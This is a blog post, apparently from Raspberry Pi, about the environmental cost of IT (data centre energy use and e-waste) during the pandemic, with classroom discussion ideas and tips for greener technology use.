With the onset of the pandemic, the world seemed to shut down. Flights were grounded, fewer people were commuting, and companies and individuals increased their use of technology for work and communication. On the surface, this seemed like a positive time for the environment. However, I soon found myself wondering about the impact that this increased use of technology would have on our planet, in particular the increases in energy consumption and e-waste. This is a major social, moral, and ethical issue that is hiding in plain sight — green IT is big news.

Energy and data centres

Thinking that online is always better for the planet is not always as straightforward as it seems. If we choose to meet via conference call rather than travelling to a meeting, there are hidden environmental impacts to consider. If there are 50 people on a call from across the globe, all of the data generated is being routed around the world through data centres, and a lot of energy is being used. If all of those people are also using video, that is even more energy than audio only.

Stacks of server hardware behind metal fencing in a data centre.
Data centres consume a lot of energy — and how is that energy generated?

Not only is the amount of energy being used a concern, but we must also ask ourselves how these data centres are being powered. Is the energy they are using coming from a renewable source? If not, we may be replacing one environmental problem with another.

What about other areas of our lives, such as taking photos or filming videos? These two activities have probably increased as we have been separated from family and friends. They use energy, especially when the image or video is then shared with others around the world and consequently routed through data centres. A large amount of energy is being used, and more is used the further the image travels.

Similarly, consider social media and the number of posts individuals and companies make on a daily basis. All of these are travelling through data centres and using energy, yet for the most part this is not visible to the user.

E-waste

E-waste is another green IT issue, and one that will only get worse as we rely on electronic devices more. As well as the potential eyesore of mountains of e-waste, there is also the impact upon the planet of mining the precious metals used in these electronics, such as gold, copper, aluminium, and steel.

A hand holding two smartphones.
In their marketing, device manufacturers and mobile network carriers make us see the phones we currently own in a negative light so that we feel the need to upgrade to the newest model.

The processes used to mine these metals lead to pollution, and we should also consider that some of the precious metals used in our devices could run out, as there is not an endless supply in the Earth’s surface.

It is also problematic that a lot of e-waste is sent to developing countries with limited recycling plants, and so much of the e-waste ends up in landfill. This can lead to toxic substances being leaked into the Earth’s surface.

First steps towards action

With my reflective hat on, I started to think about discussions we as teachers could have with pupils around this topic, and came up with the following:

  • Help learners to talk about the cloud and where it is located. We can remind them that the cloud is a physical entity. Show them images of data centres to help make this real, and allow them to appreciate where the data we generate every day goes.
  • Ask learners how many photos and videos they have on their devices, and where they think those items are stored. This can be extended to a year group or whole-school exercise so they can really appreciate the sheer amount of data being used and sent across the cloud, and how data centres fit with that energy consumption. I did this activity and found that I had 7163 photos and 304 videos on my phone — that’s using a lot of energy!
A classroom of students in North America.
Helping young people gain an understanding of the impact of our use of electronic devices is an important action you can take.
  • Ask learners to research any local data centres and find out how many data centres there are in the world. You could then develop this into a discussion, including language related to data centres such as sensors, storage devices, cabling, and infrastructure. This helps learners to connect the theory to real-world examples.
  • Ask learners to reflect upon how many devices they use that are connected to the Internet of Things.
  • Consider for ourselves and ask parents, family, and friends how our online usage has changed since before the pandemic.
  • Consider what happens to electronic devices when they are thrown away and become e-waste. Where does it all go? What is the effect of e-waste on communities and countries?

Tips for greener IT

UK-based educators can watch a recent episode of TV programme Dispatches that investigates the carbon footprint of the IT industry. You can add the following tips from the programme to your discussions:

  • Turn off electronic devices when not in use
  • Use audio only when on online calls
  • Dispose of your old devices responsibly
  • Look at company websites and see what their commitment is to green IT, and consider whether we should support companies whose commitment to the planet is poor
  • Use WiFi instead of 3G/4G/5G, as it uses less energy

These lists are not exhaustive, but provide a good starting point for discussions with learners. We should all play our small part in ensuring that we #RestoreOurEarth — this year’s Earth Day theme — and having an awareness and understanding of the impact of our use of electronic devices is part of the way forward.

Some resources on green IT — do you have others?

What about you? In the comments below, share your thoughts, tips, and resources on green IT and how we can bring awareness of it to our learners and young people at home.

The post Green information technology and classroom discussions appeared first on Raspberry Pi.
